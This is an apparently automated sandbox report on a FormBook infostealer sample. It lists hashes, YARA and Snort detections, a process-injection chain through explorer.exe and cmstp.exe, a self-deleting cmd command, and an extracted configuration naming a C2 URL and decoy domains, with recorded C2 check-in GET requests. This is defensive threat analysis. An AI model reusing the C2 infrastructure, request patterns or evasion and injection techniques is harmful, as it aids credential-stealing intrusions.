Loading ...

Play interactive tourEdit tour

Windows Analysis Report QxVf0A9SFT

Overview

General Information

Sample Name:QxVf0A9SFT (renamed file extension from none to exe)
Analysis ID:452671
MD5:04ea3fcf816b22f98adf5267204615f0
SHA1:06a21e2a043f00a4f1f364975b3de139f8f508f3
SHA256:62269dc86f9f29aeeeb4966505408fccefef782f08334def058cdca5884b9c4b
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: CMSTP Execution Process Creation
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • QxVf0A9SFT.exe (PID: 4464 cmdline: 'C:\Users\user\Desktop\QxVf0A9SFT.exe' MD5: 04EA3FCF816B22F98ADF5267204615F0)
    • QxVf0A9SFT.exe (PID: 3720 cmdline: C:\Users\user\Desktop\QxVf0A9SFT.exe MD5: 04EA3FCF816B22F98ADF5267204615F0)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 612 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5232 cmdline: /c del 'C:\Users\user\Desktop\QxVf0A9SFT.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.367232255.00000000018D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000012.00000002.367232255.00000000018D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000012.00000002.367232255.00000000018D0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000012.00000002.366037368.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000012.00000002.366037368.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      18.2.QxVf0A9SFT.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        18.2.QxVf0A9SFT.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        18.2.QxVf0A9SFT.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        18.2.QxVf0A9SFT.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          18.2.QxVf0A9SFT.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: CMSTP Execution Process CreationShow sources
          Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c del 'C:\Users\user\Desktop\QxVf0A9SFT.exe', CommandLine: /c del 'C:\Users\user\Desktop\QxVf0A9SFT.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 612, ProcessCommandLine: /c del 'C:\Users\user\Desktop\QxVf0A9SFT.exe', ProcessId: 5232

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.alfenas.info/p2io/?YdE=9rL05XJhqvsTNT&xJB=qSqSgno/BG4XQ9RzVLtR5zfvl4qKeuO7jrFeJ6D3vYZW0mQ/jO0gy2XM9tF7BGvyf3dvAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000012.00000002.367232255.00000000018D0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: QxVf0A9SFT.exeVirustotal: Detection: 44%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 18.2.QxVf0A9SFT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.QxVf0A9SFT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000012.00000002.367232255.00000000018D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.366037368.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.501654097.0000000002B60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.366993982.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.499466554.0000000000960000.00000004.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: QxVf0A9SFT.exeJoe Sandbox ML: detected
          Source: 18.2.QxVf0A9SFT.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: QxVf0A9SFT.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: QxVf0A9SFT.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: QxVf0A9SFT.exe, 00000012.00000002.367313911.0000000001920000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000014.00000000.336398999.000000000EC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: QxVf0A9SFT.exe, 00000012.00000002.368123180.0000000001AEF000.00000040.00000001.sdmp, cmstp.exe, 00000015.00000002.502745241.00000000044F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QxVf0A9SFT.exe, 00000012.00000002.368123180.0000000001AEF000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: QxVf0A9SFT.exe, 00000012.00000002.367313911.0000000001920000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000014.00000000.336398999.000000000EC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49726 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49726 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49726 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.adultpeace.com/p2io/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.m678.xyz
          Source: global trafficHTTP traffic detected: GET /p2io/?YdE=9rL05XJhqvsTNT&xJB=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it6teibs/QUjW HTTP/1.1Host: www.adultpeace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?YdE=9rL05XJhqvsTNT&xJB=qSqSgno/BG4XQ9RzVLtR5zfvl4qKeuO7jrFeJ6D3vYZW0mQ/jO0gy2XM9tF7BGvyf3dv HTTP/1.1Host: www.alfenas.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 163.44.239.73 163.44.239.73
          Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
          Source: global trafficHTTP traffic detected: GET /p2io/?YdE=9rL05XJhqvsTNT&xJB=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it6teibs/QUjW HTTP/1.1Host: www.adultpeace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?YdE=9rL05XJhqvsTNT&xJB=qSqSgno/BG4XQ9RzVLtR5zfvl4qKeuO7jrFeJ6D3vYZW0mQ/jO0gy2XM9tF7BGvyf3dv HTTP/1.1Host: www.alfenas.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.adultpeace.com
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: QxVf0A9SFT.exeString found in binary or memory: http://tempuri.org/SeguridadDS.xsd
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: QxVf0A9SFT.exe, 00000000.00000003.237514448.0000000006250000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comuL
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: QxVf0A9SFT.exe, 00000000.00000003.242529960.000000000624D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers:
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: QxVf0A9SFT.exe, 00000000.00000003.234445179.000000000625B000.00000004.00000001.sdmp, explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: QxVf0A9SFT.exe, 00000000.00000003.234412924.000000000625E000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comX
          Source: QxVf0A9SFT.exe, 00000000.00000003.236776997.000000000627D000.00000004.00000001.sdmp, explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: QxVf0A9SFT.exe, 00000000.00000003.236776997.000000000627D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn&
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: QxVf0A9SFT.exe, 00000000.00000003.236776997.000000000627D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnb
          Source: QxVf0A9SFT.exe, 00000000.00000003.236776997.000000000627D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnd
          Source: QxVf0A9SFT.exe, 00000000.00000003.236776997.000000000627D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnu-h
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: QxVf0A9SFT.exe, 00000000.00000003.238487110.0000000006244000.00000004.00000001.sdmp, explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: QxVf0A9SFT.exe, 00000000.00000003.238487110.0000000006244000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-czPgm
          Source: QxVf0A9SFT.exe, 00000000.00000003.238487110.0000000006244000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/7g
          Source: QxVf0A9SFT.exe, 00000000.00000003.238487110.0000000006244000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/VerdMgH
          Source: QxVf0A9SFT.exe, 00000000.00000003.238487110.0000000006244000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: QxVf0A9SFT.exe, 00000000.00000003.238487110.0000000006244000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/tgA
          Source: QxVf0A9SFT.exe, 00000000.00000003.233768270.000000000625E000.00000004.00000001.sdmp, explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: QxVf0A9SFT.exe, 00000000.00000003.233768270.000000000625E000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comd
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: QxVf0A9SFT.exe, 00000000.00000003.235729383.0000000006249000.00000004.00000001.sdmp, explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: QxVf0A9SFT.exe, 00000000.00000003.234871936.000000000625B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com4
          Source: QxVf0A9SFT.exe, 00000000.00000003.234787437.000000000625B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comc
          Source: QxVf0A9SFT.exe, 00000000.00000003.234871936.000000000625B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comc=
          Source: QxVf0A9SFT.exe, 00000000.00000003.234922559.000000000625B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comcom4
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 18.2.QxVf0A9SFT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.QxVf0A9SFT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000012.00000002.367232255.00000000018D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.366037368.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.501654097.0000000002B60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.366993982.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.499466554.0000000000960000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 18.2.QxVf0A9SFT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.2.QxVf0A9SFT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 18.2.QxVf0A9SFT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.2.QxVf0A9SFT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.367232255.00000000018D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.367232255.00000000018D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.366037368.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.366037368.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.501654097.0000000002B60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.501654097.0000000002B60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.366993982.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.366993982.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.499466554.0000000000960000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.499466554.0000000000960000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_004182AC NtReadFile,
          Source: C:\Users\user\Desktop\QxVf0A9SFT.exeCode function: 18_2_0041838B NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_045596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 21_2_04559710 NtQueryInformationToken,LdrInitializeThunk,
